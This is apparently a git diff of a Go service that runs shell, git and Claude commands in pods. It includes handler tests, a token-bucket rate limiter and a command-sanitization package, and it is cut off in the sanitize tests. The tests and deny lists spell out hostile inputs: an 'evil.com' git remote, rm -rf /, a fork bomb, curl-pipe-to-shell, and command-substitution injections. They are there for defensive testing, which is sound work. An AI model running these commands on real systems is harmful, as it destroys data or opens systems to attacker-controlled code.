t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String())
}
if tt.wantErr != "" {
if !strings.Contains(rec.Body.String(), tt.wantErr) {
t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr)
}
}
})
}
}
// TestProjectsHandler_RunGit tests the RunGit endpoint.
func TestProjectsHandler_RunGit(t *testing.T) {
h := NewProjectsHandler()
router := chi.NewRouter()
h.Mount(router)
tests := []struct {
name string
projectID string
body any
wantStatus int
wantErr string
}{
{
name: "valid git status",
projectID: "pantheon",
body: GitRequest{
Args: []string{"status"},
},
wantStatus: http.StatusCreated,
},
{
name: "valid git log",
projectID: "pantheon",
body: GitRequest{
Args: []string{"log", "--oneline", "-10"},
},
wantStatus: http.StatusCreated,
},
{
name: "missing args",
projectID: "pantheon",
body: GitRequest{
Args: []string{},
},
wantStatus: http.StatusBadRequest,
wantErr: "args is required",
},
{
name: "git config blocked",
projectID: "pantheon",
body: GitRequest{
Args: []string{"config", "--global", "user.name", "attacker"},
},
wantStatus: http.StatusBadRequest,
wantErr: "git config",
},
{
name: "git remote blocked",
projectID: "pantheon",
body: GitRequest{
Args: []string{"remote", "add", "evil", "https://evil.com/repo"},
},
wantStatus: http.StatusBadRequest,
wantErr: "git remote",
},
{
name: "force push blocked",
projectID: "pantheon",
body: GitRequest{
Args: []string{"push", "-f", "origin", "main"},
},
wantStatus: http.StatusBadRequest,
wantErr: "force push",
},
{
name: "project not found",
projectID: "nonexistent",
body: GitRequest{Args: []string{"status"}},
wantStatus: http.StatusNotFound,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
body, _ := json.Marshal(tt.body)
req := httptest.NewRequest("POST", "/projects/"+tt.projectID+"/git", bytes.NewReader(body))
req.Header.Set("Content-Type", "application/json")
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != tt.wantStatus {
t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String())
}
if tt.wantErr != "" {
if !strings.Contains(rec.Body.String(), tt.wantErr) {
t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr)
}
}
})
}
}
// TestProjectsHandler_Events tests the Events SSE endpoint.
func TestProjectsHandler_Events(t *testing.T) {
h := NewProjectsHandler()
router := chi.NewRouter()
h.Mount(router)
// Note: SSE tests with headers are difficult in httptest because the
// handler blocks waiting for events. We test what we can without blocking.
t.Run("project not found", func(t *testing.T) {
req := httptest.NewRequest("GET", "/projects/nonexistent/events", nil)
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != http.StatusNotFound {
t.Errorf("Status = %d, want 404", rec.Code)
}
})
}
// TestProjectsHandler_InvalidJSON tests handling of invalid JSON bodies.
func TestProjectsHandler_InvalidJSON(t *testing.T) {
h := NewProjectsHandler()
router := chi.NewRouter()
h.Mount(router)
endpoints := []struct {
method string
path string
}{
{"POST", "/projects/pantheon/claude"},
{"POST", "/projects/pantheon/shell"},
{"POST", "/projects/pantheon/git"},
}
for _, ep := range endpoints {
t.Run(ep.path, func(t *testing.T) {
req := httptest.NewRequest(ep.method, ep.path, strings.NewReader("invalid json{"))
req.Header.Set("Content-Type", "application/json")
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
if rec.Code != http.StatusBadRequest {
t.Errorf("Status = %d, want 400. Body: %s", rec.Code, rec.Body.String())
}
if !strings.Contains(rec.Body.String(), "invalid") {
t.Errorf("Body = %q, want to contain 'invalid'", rec.Body.String())
}
})
}
}
// TestCommandIDGeneration tests that command IDs are generated correctly.
func TestCommandIDGeneration(t *testing.T) {
h := NewProjectsHandler()
router := chi.NewRouter()
h.Mount(router)
// Send two requests and verify they get different command IDs
body := ClaudeRequest{Prompt: "test"}
bodyBytes, _ := json.Marshal(body)
req1 := httptest.NewRequest("POST", "/projects/pantheon/claude", bytes.NewReader(bodyBytes))
req1.Header.Set("Content-Type", "application/json")
rec1 := httptest.NewRecorder()
router.ServeHTTP(rec1, req1)
req2 := httptest.NewRequest("POST", "/projects/pantheon/claude", bytes.NewReader(bodyBytes))
req2.Header.Set("Content-Type", "application/json")
rec2 := httptest.NewRecorder()
router.ServeHTTP(rec2, req2)
// Parse both responses
var resp1, resp2 map[string]any
json.NewDecoder(bytes.NewReader(rec1.Body.Bytes())).Decode(&resp1)
json.NewDecoder(bytes.NewReader(rec2.Body.Bytes())).Decode(&resp2)
data1, _ := resp1["data"].(map[string]any)
data2, _ := resp2["data"].(map[string]any)
if data1["id"] == data2["id"] {
t.Error("Two requests should have different command IDs")
}
}
// TestCustomStreamID tests that custom stream IDs are used when provided.
func TestCustomStreamID(t *testing.T) {
h := NewProjectsHandler()
router := chi.NewRouter()
h.Mount(router)
body := ClaudeRequest{
Prompt: "test",
StreamID: "my-custom-stream-id",
}
bodyBytes, _ := json.Marshal(body)
req := httptest.NewRequest("POST", "/projects/pantheon/claude", bytes.NewReader(bodyBytes))
req.Header.Set("Content-Type", "application/json")
rec := httptest.NewRecorder()
router.ServeHTTP(rec, req)
var resp map[string]any
json.NewDecoder(rec.Body).Decode(&resp)
data, _ := resp["data"].(map[string]any)
if data["id"] != "my-custom-stream-id" {
t.Errorf("Command ID = %v, want my-custom-stream-id", data["id"])
}
}

View File

@ -0,0 +1,28 @@
package port
import (
"context"
"github.com/orchard9/rdev/internal/domain"
)
// APIKeyRepository defines operations for managing API keys.
type APIKeyRepository interface {
// Create stores a new API key.
Create(ctx context.Context, key *domain.APIKey, keyHash string) error
// GetByHash retrieves an API key by its hash.
GetByHash(ctx context.Context, keyHash string) (*domain.APIKey, error)
// Get retrieves an API key by ID.
Get(ctx context.Context, id domain.APIKeyID) (*domain.APIKey, error)
// List returns all API keys (without secrets).
List(ctx context.Context) ([]*domain.APIKey, error)
// Revoke marks an API key as revoked.
Revoke(ctx context.Context, id domain.APIKeyID) error
// UpdateLastUsed updates the last used timestamp for a key.
UpdateLastUsed(ctx context.Context, id domain.APIKeyID) error
}

View File

@ -0,0 +1,22 @@
package port
import (
"context"
"github.com/orchard9/rdev/internal/domain"
)
// CommandExecutor defines operations for executing commands in pods.
type CommandExecutor interface {
// Execute runs a command in the target pod and streams output to the handler.
Execute(ctx context.Context, cmd *domain.Command, podName string, handler domain.OutputHandler) (*domain.CommandResult, error)
// Cancel attempts to cancel a running command.
Cancel(ctx context.Context, cmdID domain.CommandID) error
// PodExists checks if a pod exists and is running.
PodExists(ctx context.Context, podName string) (bool, error)
// CheckConnection verifies connectivity to the Kubernetes cluster.
CheckConnection(ctx context.Context) error
}

View File

@ -0,0 +1,31 @@
// Package port defines interfaces (ports) for external dependencies.
// These interfaces define the contracts between the application core and
// infrastructure adapters, enabling testability and flexibility.
package port
import (
"context"
"github.com/orchard9/rdev/internal/domain"
)
// ProjectRepository defines operations for managing projects.
type ProjectRepository interface {
// List returns all available projects.
List(ctx context.Context) ([]domain.Project, error)
// Get returns a project by ID.
Get(ctx context.Context, id domain.ProjectID) (*domain.Project, error)
// Exists checks if a project exists.
Exists(ctx context.Context, id domain.ProjectID) (bool, error)
// Register adds a new project to the repository.
Register(ctx context.Context, project *domain.Project) error
// Unregister removes a project from the repository.
Unregister(ctx context.Context, id domain.ProjectID) error
// RefreshStatus updates the status of all projects.
RefreshStatus(ctx context.Context) error
}

View File

@ -0,0 +1,20 @@
package port
// StreamEvent represents an event to be published on a stream.
type StreamEvent struct {
Type string
Data map[string]any
}
// StreamPublisher defines operations for managing SSE event streams.
type StreamPublisher interface {
// Subscribe creates a subscription to events for the given stream ID.
// Returns a channel that will receive events and a cleanup function.
Subscribe(streamID string) (<-chan StreamEvent, func())
// Publish sends an event to all subscribers of a stream.
Publish(streamID string, event StreamEvent)
// Close closes a stream and all its subscriptions.
Close(streamID string)
}

View File

@ -0,0 +1,272 @@
// Package ratelimit provides rate limiting middleware for HTTP handlers.
package ratelimit
import (
"net/http"
"sync"
"time"
"github.com/orchard9/rdev/internal/auth"
"github.com/orchard9/rdev/pkg/api"
)
// Config defines rate limit parameters.
type Config struct {
// RequestsPerMinute is the average rate limit.
RequestsPerMinute int
// BurstSize is the maximum number of requests allowed in a burst.
// Defaults to RequestsPerMinute / 2 if not set.
BurstSize int
// CleanupInterval is how often to clean up stale entries.
// Defaults to 5 minutes.
CleanupInterval time.Duration
// KeyFunc extracts the rate limit key from a request.
// Defaults to using the API key ID from context.
KeyFunc func(*http.Request) string
}
// DefaultConfig returns a sensible default configuration.
func DefaultConfig() Config {
return Config{
RequestsPerMinute: 100,
BurstSize: 50,
CleanupInterval: 5 * time.Minute,
}
}
// Limiter implements token bucket rate limiting.
type Limiter struct {
cfg Config
buckets map[string]*bucket
mu sync.RWMutex
stopCh chan struct{}
}
type bucket struct {
tokens float64
lastUpdate time.Time
}
// New creates a new rate limiter with the given configuration.
func New(cfg Config) *Limiter {
if cfg.RequestsPerMinute <= 0 {
cfg.RequestsPerMinute = 100
}
if cfg.BurstSize <= 0 {
cfg.BurstSize = cfg.RequestsPerMinute / 2
if cfg.BurstSize < 1 {
cfg.BurstSize = 1
}
}
if cfg.CleanupInterval <= 0 {
cfg.CleanupInterval = 5 * time.Minute
}
l := &Limiter{
cfg: cfg,
buckets: make(map[string]*bucket),
stopCh: make(chan struct{}),
}
// Start cleanup goroutine
go l.cleanup()
return l
}
// Stop stops the background cleanup goroutine.
func (l *Limiter) Stop() {
close(l.stopCh)
}
// Allow checks if a request is allowed under the rate limit.
// Returns remaining tokens and whether the request is allowed.
func (l *Limiter) Allow(key string) (remaining int, allowed bool) {
now := time.Now()
l.mu.Lock()
defer l.mu.Unlock()
b, exists := l.buckets[key]
if !exists {
b = &bucket{
tokens: float64(l.cfg.BurstSize),
lastUpdate: now,
}
l.buckets[key] = b
}
// Refill tokens based on time elapsed
elapsed := now.Sub(b.lastUpdate).Seconds()
rate := float64(l.cfg.RequestsPerMinute) / 60.0 // tokens per second
b.tokens += elapsed * rate
if b.tokens > float64(l.cfg.BurstSize) {
b.tokens = float64(l.cfg.BurstSize)
}
b.lastUpdate = now
// Try to consume a token
if b.tokens >= 1 {
b.tokens--
return int(b.tokens), true
}
return 0, false
}
// Middleware returns an HTTP middleware that enforces rate limits.
func (l *Limiter) Middleware() func(http.Handler) http.Handler {
return func(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// Get the rate limit key
key := l.getKey(r)
if key == "" {
// No key means no rate limiting (e.g., health checks)
next.ServeHTTP(w, r)
return
}
remaining, allowed := l.Allow(key)
// Set rate limit headers
w.Header().Set("X-RateLimit-Limit", itoa(l.cfg.RequestsPerMinute))
w.Header().Set("X-RateLimit-Remaining", itoa(remaining))
if !allowed {
// Calculate retry time
retryAfter := 60.0 / float64(l.cfg.RequestsPerMinute)
w.Header().Set("Retry-After", itoa(int(retryAfter)+1))
api.WriteError(w, r, http.StatusTooManyRequests, "RATE_LIMITED",
"Rate limit exceeded. Please retry later.")
return
}
next.ServeHTTP(w, r)
})
}
}
func (l *Limiter) getKey(r *http.Request) string {
// Use custom key function if provided
if l.cfg.KeyFunc != nil {
return l.cfg.KeyFunc(r)
}
// Default: use API key ID from context
// This requires the auth middleware to run first
if apiKey := auth.GetAPIKey(r.Context()); apiKey != nil {
return apiKey.ID
}
// Fallback: use client IP
return getClientIP(r)
}
func (l *Limiter) cleanup() {
ticker := time.NewTicker(l.cfg.CleanupInterval)
defer ticker.Stop()
for {
select {
case <-l.stopCh:
return
case <-ticker.C:
l.doCleanup()
}
}
}
func (l *Limiter) doCleanup() {
l.mu.Lock()
defer l.mu.Unlock()
// Remove buckets that haven't been used in 2x cleanup interval
threshold := time.Now().Add(-2 * l.cfg.CleanupInterval)
for key, b := range l.buckets {
if b.lastUpdate.Before(threshold) {
delete(l.buckets, key)
}
}
}
// getClientIP extracts the client IP from the request.
func getClientIP(r *http.Request) string {
// Check X-Forwarded-For header (set by proxies/load balancers)
if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
// Take the first IP in the chain
for i := 0; i < len(xff); i++ {
if xff[i] == ',' {
return xff[:i]
}
}
return xff
}
// Check X-Real-IP header
if xri := r.Header.Get("X-Real-IP"); xri != "" {
return xri
}
// Fall back to RemoteAddr
// RemoteAddr is "IP:port", so strip the port
addr := r.RemoteAddr
for i := len(addr) - 1; i >= 0; i-- {
if addr[i] == ':' {
return addr[:i]
}
}
return addr
}
// itoa converts an integer to a string without importing strconv.
func itoa(i int) string {
if i == 0 {
return "0"
}
negative := i < 0
if negative {
i = -i
}
// Max int64 is 19 digits
buf := make([]byte, 0, 20)
for i > 0 {
buf = append(buf, byte('0'+i%10))
i /= 10
}
if negative {
buf = append(buf, '-')
}
// Reverse
for left, right := 0, len(buf)-1; left < right; left, right = left+1, right-1 {
buf[left], buf[right] = buf[right], buf[left]
}
return string(buf)
}
// KeyFromAPIKey creates a KeyFunc that extracts the API key ID for rate limiting.
// This is useful when you want to rate limit by API key rather than IP.
func KeyFromAPIKey() func(*http.Request) string {
return func(r *http.Request) string {
if apiKey := auth.GetAPIKey(r.Context()); apiKey != nil {
return apiKey.ID
}
return getClientIP(r)
}
}
// KeyFromIP creates a KeyFunc that uses client IP for rate limiting.
func KeyFromIP() func(*http.Request) string {
return func(r *http.Request) string {
return getClientIP(r)
}
}

View File

@ -0,0 +1,413 @@
package ratelimit
import (
"net/http"
"net/http/httptest"
"sync"
"testing"
"time"
"github.com/orchard9/rdev/internal/auth"
)
func TestNew(t *testing.T) {
t.Run("default config", func(t *testing.T) {
l := New(Config{})
defer l.Stop()
if l.cfg.RequestsPerMinute != 100 {
t.Errorf("RequestsPerMinute = %d, want 100", l.cfg.RequestsPerMinute)
}
if l.cfg.BurstSize != 50 {
t.Errorf("BurstSize = %d, want 50", l.cfg.BurstSize)
}
})
t.Run("custom config", func(t *testing.T) {
l := New(Config{
RequestsPerMinute: 200,
BurstSize: 100,
CleanupInterval: time.Minute,
})
defer l.Stop()
if l.cfg.RequestsPerMinute != 200 {
t.Errorf("RequestsPerMinute = %d, want 200", l.cfg.RequestsPerMinute)
}
if l.cfg.BurstSize != 100 {
t.Errorf("BurstSize = %d, want 100", l.cfg.BurstSize)
}
})
}
func TestDefaultConfig(t *testing.T) {
cfg := DefaultConfig()
if cfg.RequestsPerMinute != 100 {
t.Errorf("RequestsPerMinute = %d, want 100", cfg.RequestsPerMinute)
}
if cfg.BurstSize != 50 {
t.Errorf("BurstSize = %d, want 50", cfg.BurstSize)
}
if cfg.CleanupInterval != 5*time.Minute {
t.Errorf("CleanupInterval = %v, want 5m", cfg.CleanupInterval)
}
}
func TestAllow(t *testing.T) {
t.Run("allows requests within limit", func(t *testing.T) {
l := New(Config{
RequestsPerMinute: 60,
BurstSize: 10,
})
defer l.Stop()
// Should allow burst requests
for i := 0; i < 10; i++ {
remaining, allowed := l.Allow("test-key")
if !allowed {
t.Errorf("Request %d was denied, want allowed", i)
}
if remaining != 10-i-1 {
t.Errorf("Request %d: remaining = %d, want %d", i, remaining, 10-i-1)
}
}
})
t.Run("denies requests exceeding limit", func(t *testing.T) {
l := New(Config{
RequestsPerMinute: 60,
BurstSize: 5,
})
defer l.Stop()
// Exhaust the bucket
for i := 0; i < 5; i++ {
l.Allow("test-key")
}
// Next request should be denied
_, allowed := l.Allow("test-key")
if allowed {
t.Error("Request was allowed, want denied")
}
})
t.Run("refills over time", func(t *testing.T) {
l := New(Config{
RequestsPerMinute: 60, // 1 per second
BurstSize: 1,
})
defer l.Stop()
// Use the one token
l.Allow("test-key")
// Should be denied immediately
_, allowed := l.Allow("test-key")
if allowed {
t.Error("Request was allowed immediately, want denied")
}
// Wait for refill (1 token per second)
time.Sleep(1100 * time.Millisecond)
// Should be allowed now
_, allowed = l.Allow("test-key")
if !allowed {
t.Error("Request was denied after refill, want allowed")
}
})
t.Run("separate buckets per key", func(t *testing.T) {
l := New(Config{
RequestsPerMinute: 60,
BurstSize: 1,
})
defer l.Stop()
// Exhaust key1
l.Allow("key1")
_, allowed1 := l.Allow("key1")
if allowed1 {
t.Error("key1 was allowed, want denied")
}
// key2 should still have tokens
_, allowed2 := l.Allow("key2")
if !allowed2 {
t.Error("key2 was denied, want allowed")
}
})
}
func TestMiddleware(t *testing.T) {
handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
w.Write([]byte("OK"))
})
t.Run("allows requests within limit", func(t *testing.T) {
l := New(Config{
RequestsPerMinute: 100,
BurstSize: 10,
KeyFunc: KeyFromIP(),
})
defer l.Stop()
middleware := l.Middleware()
wrapped := middleware(handler)
req := httptest.NewRequest("GET", "/test", nil)
req.RemoteAddr = "192.168.1.1:12345"
rec := httptest.NewRecorder()
wrapped.ServeHTTP(rec, req)
if rec.Code != http.StatusOK {
t.Errorf("Status = %d, want 200", rec.Code)
}
if rec.Header().Get("X-RateLimit-Limit") != "100" {
t.Errorf("X-RateLimit-Limit = %q, want 100", rec.Header().Get("X-RateLimit-Limit"))
}
})
t.Run("returns 429 when rate limited", func(t *testing.T) {
l := New(Config{
RequestsPerMinute: 60,
BurstSize: 1,
KeyFunc: KeyFromIP(),
})
defer l.Stop()
middleware := l.Middleware()
wrapped := middleware(handler)
// First request should succeed
req1 := httptest.NewRequest("GET", "/test", nil)
req1.RemoteAddr = "192.168.1.1:12345"
rec1 := httptest.NewRecorder()
wrapped.ServeHTTP(rec1, req1)
if rec1.Code != http.StatusOK {
t.Errorf("First request status = %d, want 200", rec1.Code)
}
// Second request should be rate limited
req2 := httptest.NewRequest("GET", "/test", nil)
req2.RemoteAddr = "192.168.1.1:12345"
rec2 := httptest.NewRecorder()
wrapped.ServeHTTP(rec2, req2)
if rec2.Code != http.StatusTooManyRequests {
t.Errorf("Second request status = %d, want 429", rec2.Code)
}
if rec2.Header().Get("Retry-After") == "" {
t.Error("Retry-After header not set")
}
})
t.Run("no key means no rate limiting", func(t *testing.T) {
l := New(Config{
RequestsPerMinute: 60,
BurstSize: 1,
KeyFunc: func(r *http.Request) string {
return "" // No key
},
})
defer l.Stop()
middleware := l.Middleware()
wrapped := middleware(handler)
// Multiple requests should all succeed
for i := 0; i < 5; i++ {
req := httptest.NewRequest("GET", "/test", nil)
rec := httptest.NewRecorder()
wrapped.ServeHTTP(rec, req)
if rec.Code != http.StatusOK {
t.Errorf("Request %d status = %d, want 200", i, rec.Code)
}
}
})
}
func TestGetClientIP(t *testing.T) {
tests := []struct {
name string
remoteAddr string
xff string
xri string
want string
}{
{"from RemoteAddr", "192.168.1.1:12345", "", "", "192.168.1.1"},
{"from X-Forwarded-For single", "127.0.0.1:8080", "10.0.0.1", "", "10.0.0.1"},
{"from X-Forwarded-For multiple", "127.0.0.1:8080", "10.0.0.1, 10.0.0.2", "", "10.0.0.1"},
{"from X-Real-IP", "127.0.0.1:8080", "", "10.0.0.5", "10.0.0.5"},
{"X-Forwarded-For takes precedence", "127.0.0.1:8080", "10.0.0.1", "10.0.0.5", "10.0.0.1"},
{"no port in RemoteAddr", "192.168.1.1", "", "", "192.168.1.1"},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
req := httptest.NewRequest("GET", "/", nil)
req.RemoteAddr = tt.remoteAddr
if tt.xff != "" {
req.Header.Set("X-Forwarded-For", tt.xff)
}
if tt.xri != "" {
req.Header.Set("X-Real-IP", tt.xri)
}
got := getClientIP(req)
if got != tt.want {
t.Errorf("getClientIP() = %q, want %q", got, tt.want)
}
})
}
}
func TestKeyFromAPIKey(t *testing.T) {
keyFunc := KeyFromAPIKey()
t.Run("extracts from context", func(t *testing.T) {
req := httptest.NewRequest("GET", "/", nil)
apiKey := &auth.APIKey{ID: "test-key-123"}
ctx := auth.WithAPIKey(req.Context(), apiKey)
req = req.WithContext(ctx)
got := keyFunc(req)
if got != "test-key-123" {
t.Errorf("KeyFromAPIKey() = %q, want test-key-123", got)
}
})
t.Run("falls back to IP", func(t *testing.T) {
req := httptest.NewRequest("GET", "/", nil)
req.RemoteAddr = "192.168.1.100:12345"
got := keyFunc(req)
if got != "192.168.1.100" {
t.Errorf("KeyFromAPIKey() = %q, want 192.168.1.100", got)
}
})
}
func TestKeyFromIP(t *testing.T) {
keyFunc := KeyFromIP()
req := httptest.NewRequest("GET", "/", nil)
req.RemoteAddr = "10.0.0.50:12345"
got := keyFunc(req)
if got != "10.0.0.50" {
t.Errorf("KeyFromIP() = %q, want 10.0.0.50", got)
}
}
func TestItoa(t *testing.T) {
tests := []struct {
input int
want string
}{
{0, "0"},
{1, "1"},
{10, "10"},
{100, "100"},
{12345, "12345"},
{-1, "-1"},
{-12345, "-12345"},
}
for _, tt := range tests {
t.Run(tt.want, func(t *testing.T) {
got := itoa(tt.input)
if got != tt.want {
t.Errorf("itoa(%d) = %q, want %q", tt.input, got, tt.want)
}
})
}
}
func TestConcurrentAccess(t *testing.T) {
l := New(Config{
RequestsPerMinute: 1000,
BurstSize: 100,
})
defer l.Stop()
var wg sync.WaitGroup
var allowedCount, deniedCount int64
var mu sync.Mutex
// Spawn many goroutines making requests
for i := 0; i < 200; i++ {
wg.Add(1)
go func() {
defer wg.Done()
_, allowed := l.Allow("concurrent-test")
mu.Lock()
if allowed {
allowedCount++
} else {
deniedCount++
}
mu.Unlock()
}()
}
wg.Wait()
// Should have allowed approximately BurstSize requests
// and denied the rest
if allowedCount < 90 || allowedCount > 110 {
t.Errorf("allowedCount = %d, want ~100", allowedCount)
}
if deniedCount < 90 || deniedCount > 110 {
t.Errorf("deniedCount = %d, want ~100", deniedCount)
}
}
func TestCleanup(t *testing.T) {
l := New(Config{
RequestsPerMinute: 60,
BurstSize: 10,
CleanupInterval: 50 * time.Millisecond,
})
defer l.Stop()
// Make some requests to create buckets
l.Allow("key1")
l.Allow("key2")
l.mu.RLock()
bucketCount := len(l.buckets)
l.mu.RUnlock()
if bucketCount != 2 {
t.Errorf("bucketCount = %d, want 2", bucketCount)
}
// Wait for cleanup (2x cleanup interval)
time.Sleep(150 * time.Millisecond)
l.mu.RLock()
bucketCount = len(l.buckets)
l.mu.RUnlock()
// Buckets should be cleaned up
if bucketCount != 0 {
t.Errorf("bucketCount after cleanup = %d, want 0", bucketCount)
}
}
func TestStop(t *testing.T) {
l := New(Config{})
// Should not panic when stopping
l.Stop()
// Should not panic if stopped multiple times
// (but this is technically undefined behavior - just testing it doesn't crash)
}

View File

@ -0,0 +1,233 @@
// Package sanitize provides command input sanitization to prevent injection attacks.
package sanitize
import (
"fmt"
"regexp"
"strings"
)
// Package-level compiled regex patterns for performance.
var (
// Dangerous shell command patterns
dangerousCommandPatterns = []*dangerousPattern{
{regexp.MustCompile(`(?i)\brm\s+(-[rf]+\s+)*(/|~|\.\.|/etc|/var|/usr|/home|/root)`), "destructive rm command"},
{regexp.MustCompile(`(?i)\bdd\s+`), "dd command"},
{regexp.MustCompile(`(?i)\bmkfs\b`), "mkfs command"},
{regexp.MustCompile(`(?i)\bfdisk\b`), "fdisk command"},
{regexp.MustCompile(`(?i)\bshutdown\b`), "shutdown command"},
{regexp.MustCompile(`(?i)\breboot\b`), "reboot command"},
{regexp.MustCompile(`(?i)\bsystemctl\s+(stop|disable|mask|halt|poweroff)`), "dangerous systemctl command"},
{regexp.MustCompile(`(?i)\bkill\s+-9\s+(-1|1)\b`), "kill all processes"},
{regexp.MustCompile(`(?i)\bchmod\s+(-R\s+)?(777|666)\s+/`), "dangerous chmod on root"},
{regexp.MustCompile(`(?i)\bchown\s+-R\s+\S+\s+/`), "dangerous chown on root"},
{regexp.MustCompile(`(?i):\(\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;`), "fork bomb"},
{regexp.MustCompile(`(?i)\bcurl\s+.*\|\s*(ba)?sh`), "remote code execution via curl"},
{regexp.MustCompile(`(?i)\bwget\s+.*\|\s*(ba)?sh`), "remote code execution via wget"},
}
// Stream ID validation pattern
streamIDPattern = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9_-]*$`)
)
// dangerousPattern pairs a compiled regex with its error reason.
type dangerousPattern struct {
pattern *regexp.Regexp
reason string
}
// Error types for sanitization failures.
type Error struct {
Reason string
Input string
Pattern string
}
func (e *Error) Error() string {
if e.Pattern != "" {
return fmt.Sprintf("sanitization failed: %s (matched pattern: %q, input: %q)", e.Reason, e.Pattern, e.Input)
}
return fmt.Sprintf("sanitization failed: %s (input: %q)", e.Reason, e.Input)
}
// ShellCommand validates and sanitizes a shell command.
// Returns an error if the command contains dangerous patterns.
func ShellCommand(cmd string) error {
if strings.TrimSpace(cmd) == "" {
return &Error{Reason: "empty command", Input: cmd}
}
// Check for null bytes
if strings.ContainsRune(cmd, '\x00') {
return &Error{Reason: "contains null byte", Input: cmd}
}
// Dangerous command chaining patterns
chainPatterns := []string{
`;`, // Command separator
`&&`, // AND operator
`||`, // OR operator
`|`, // Pipe
"`", // Backtick command substitution
`$(`, // Command substitution
`${`, // Variable expansion that could be exploited
`>(`, // Process substitution
`<(`, // Process substitution
`\n`, // Newline (command separator in shell)
`\r`, // Carriage return
}
for _, pattern := range chainPatterns {
if strings.Contains(cmd, pattern) {
return &Error{
Reason: "contains command chaining operator",
Input: cmd,
Pattern: pattern,
}
}
}
// Dangerous redirect patterns
redirectPatterns := []string{
`>`, // Output redirect
`>>`, // Append redirect
`<`, // Input redirect
}
for _, pattern := range redirectPatterns {
if strings.Contains(cmd, pattern) {
return &Error{
Reason: "contains redirect operator",
Input: cmd,
Pattern: pattern,
}
}
}
// Check against pre-compiled dangerous command patterns
for _, dp := range dangerousCommandPatterns {
if dp.pattern.MatchString(cmd) {
return &Error{
Reason: dp.reason,
Input: cmd,
Pattern: dp.pattern.String(),
}
}
}
return nil
}
// GitArgs validates git command arguments.
// Returns an error if any argument contains dangerous patterns.
func GitArgs(args []string) error {
if len(args) == 0 {
return &Error{Reason: "empty git args"}
}
// Dangerous git subcommands
dangerousSubcommands := map[string]string{
"config": "git config can modify system settings",
"remote": "git remote can add malicious remotes",
"push": "git push can modify remote repositories",
}
// First arg is the subcommand
subcommand := strings.ToLower(args[0])
if reason, dangerous := dangerousSubcommands[subcommand]; dangerous {
// push is allowed for specific use cases, block only with --force
if subcommand == "push" {
for _, arg := range args[1:] {
if arg == "-f" || arg == "--force" || arg == "--force-with-lease" {
return &Error{Reason: "force push not allowed", Input: strings.Join(args, " ")}
}
}
} else {
return &Error{Reason: reason, Input: strings.Join(args, " ")}
}
}
// Check all args for shell injection
for _, arg := range args {
if err := validateArg(arg); err != nil {
return err
}
}
return nil
}
// ClaudePrompt validates a Claude prompt.
// This is relatively permissive since prompts are passed as a single argument to claude CLI.
func ClaudePrompt(prompt string) error {
if strings.TrimSpace(prompt) == "" {
return &Error{Reason: "empty prompt"}
}
// Check for null bytes
if strings.ContainsRune(prompt, '\x00') {
return &Error{Reason: "contains null byte", Input: prompt}
}
// Limit length to prevent resource exhaustion
const maxPromptLength = 100000 // 100KB
if len(prompt) > maxPromptLength {
return &Error{
Reason: fmt.Sprintf("prompt too long (max %d bytes)", maxPromptLength),
Input: prompt[:100] + "...",
}
}
return nil
}
// validateArg validates a single command argument for shell injection.
func validateArg(arg string) error {
// Check for null bytes
if strings.ContainsRune(arg, '\x00') {
return &Error{Reason: "argument contains null byte", Input: arg}
}
// Check for shell metacharacters that could break out of quoting
shellMetachars := []string{
"`", // Backtick
`$(`, // Command substitution
`${`, // Variable expansion
}
for _, meta := range shellMetachars {
if strings.Contains(arg, meta) {
return &Error{
Reason: "argument contains shell metacharacter",
Input: arg,
Pattern: meta,
}
}
}
return nil
}
// StreamID validates a stream ID.
// Stream IDs should be alphanumeric with hyphens and underscores only.
func StreamID(id string) error {
if id == "" {
return nil // Empty is allowed (will be auto-generated)
}
// Must be reasonable length
if len(id) > 64 {
return &Error{Reason: "stream ID too long (max 64 chars)", Input: id}
}
// Must match safe pattern (uses pre-compiled regex)
if !streamIDPattern.MatchString(id) {
return &Error{
Reason: "stream ID must be alphanumeric with hyphens/underscores",
Input: id,
Pattern: streamIDPattern.String(),
}
}
return nil
}

View File

@ -0,0 +1,257 @@
package sanitize
import (
"strings"
"testing"
)
func TestShellCommand(t *testing.T) {
tests := []struct {
name string
cmd string
wantErr bool
errMsg string
}{
// Valid commands
{"simple ls", "ls -la", false, ""},
{"cat file", "cat file.txt", false, ""},
{"grep pattern", "grep -r pattern .", false, ""},
{"make build", "make build", false, ""},
{"go test", "go test ./...", false, ""},
{"npm install", "npm install", false, ""},
{"python script", "python script.py", false, ""},
// Empty/whitespace
{"empty string", "", true, "empty command"},
{"whitespace only", " ", true, "empty command"},
// Null bytes
{"null byte", "ls\x00-la", true, "null byte"},
// Command chaining - semicolon
{"semicolon", "ls; rm -rf /", true, "command chaining"},
{"semicolon spaces", "ls ; rm -rf /", true, "command chaining"},
// Command chaining - AND
{"and operator", "ls && rm -rf /", true, "command chaining"},
// Command chaining - OR
{"or operator", "ls || rm -rf /", true, "command chaining"},
// Pipe
{"pipe", "ls | grep foo", true, "command chaining"},
// Backtick
{"backtick", "echo `whoami`", true, "command chaining"},
// Command substitution
{"command sub dollar", "echo $(whoami)", true, "command chaining"},
{"variable expansion", "echo ${PATH}", true, "command chaining"},
// Process substitution
{"process sub output", "cat >(ls)", true, "command chaining"},
{"process sub input", "cat <(ls)", true, "command chaining"},
// Newlines - caught by either chain detection or rm detection (order depends on implementation)
{"newline", "ls\nrm -rf /", true, ""},
{"carriage return", "ls\rrm -rf /", true, ""},
// Redirects
{"output redirect", "ls > file.txt", true, "redirect"},
{"append redirect", "ls >> file.txt", true, "redirect"},
{"input redirect", "cat < file.txt", true, "redirect"},
// Dangerous commands
{"rm rf root", "rm -rf /", true, "destructive rm"},
